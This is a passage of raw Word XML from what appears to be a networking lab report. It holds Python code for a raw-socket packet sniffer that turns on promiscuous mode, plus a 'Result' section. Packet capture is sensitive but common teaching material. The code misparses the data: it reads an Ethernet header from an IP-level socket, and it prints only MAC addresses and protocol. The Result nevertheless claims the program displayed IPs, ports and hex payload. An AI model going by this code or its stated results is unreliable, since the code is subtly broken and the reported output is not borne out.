        <w:t>Parse Ethernet header; if IPv4, parse IP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B7242B" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRPr="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:t>If TCP/UDP, parse ports. Print a one-line summary + short hex of payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F33E44" w14:textId="77777777" w:rsidR="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00B3217F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3217F">
        <w:t xml:space="preserve">Repeat until </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3217F">
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3217F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357DDEA" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="00B3217F" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0681A300" w14:textId="4FF4D043" w:rsidR="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="00B3217F">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF711B" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59631138" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t>import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48986736" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>binascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19BC629A" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>textwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B1F7B92" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD"/>
    <w:p w14:paraId="31D470C6" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF72296" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Get host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6B958" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    host = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.gethostbyname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.gethostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3031518B" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    print('IP: {}'.format(host))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20121912" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    # Create a raw socket and bind it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71588068" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.SOCK_RAW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.IPPROTO_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4310D0" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>conn.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>((host, 0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB1118" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    # Include IP headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B9F2F" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>conn.setsockopt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.IPPROTO_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.IP_HDRINCL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6A345" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    # Enable promiscuous mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E255B2" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>conn.ioctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.SIO_RCVALL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>socket.RCVALL_ON</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FE69A" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E61DC" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>Recive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D0C70" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>raw_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>conn.recvfrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(65536)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531485E" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        # Unpack data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB22720" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>dest_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>src_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>eth_proto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>ethernet_frame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>raw_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1B96E" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        print('\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>nEthernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve"> Frame:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23A481" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        print("Destination MAC: {}".format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>dest_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A9FC9" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        print("Source MAC: {}".format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>src_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D80C155" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">        print("Protocol: {}".format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>eth_proto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1AAA0" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t># Unpack ethernet frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438BA5B3" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>ethernet_frame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F609B3E" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>dest_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>src_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">, proto = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>struct.unpack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>('!6s6s2s', data[:14])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183083D9" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>get_mac_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>dest_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>get_mac_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>src_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>get_protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(proto), data[14:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0C9D7" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t># Return formatted MAC address AA:BB:CC:DD:EE:FF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C1106" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>get_mac_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5FDCD" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve"> = map('{:02x}'.format, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15068D99" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>mac_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve"> = ':'.join(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>).upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772DE2E" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>mac_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="575095A3" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t># Return formatted protocol ABCD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989710C" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>get_protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_proto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2A33D" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve"> = map('{:02x}'.format, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_proto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFD38BF" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    protocol = ''.join(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>bytes_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B439DD">
        <w:t>).upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1676CC35" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t xml:space="preserve">    return protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6684D868" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRPr="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00B439DD">
      <w:r w:rsidRPr="00B439DD">
        <w:t>main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ED9EC7" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="455D6773" w14:textId="3D8DC854" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="00A52A5F">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
      <w:r w:rsidR="00735351" w:rsidRPr="00735351">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00735351" w:rsidRPr="00B439DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D073E54" wp14:editId="59EEE9D7">
            <wp:extent cx="5285740" cy="5829300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1122580228"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80228" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5299818" cy="5844826"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814BEB4" w14:textId="12E713EC" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="4811CE15" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="0647AE82" w14:textId="58A4C24F" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="6546EE45" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="59D5076D" w14:textId="520DE9B1" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="00B439DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D092F" w14:textId="64D40167" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="00B439DD">
        <w:t>The Python program for packet sniffing using raw sockets was executed successfully.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B439DD">
        <w:br/>
        <w:t>It captured live network packets and displayed the source IP, destination IP, protocol type, port numbers, and part of the data in hexadecimal form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0127E33B" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="00382CF1" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="33637759" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="649EC1B9" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="336016E4" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
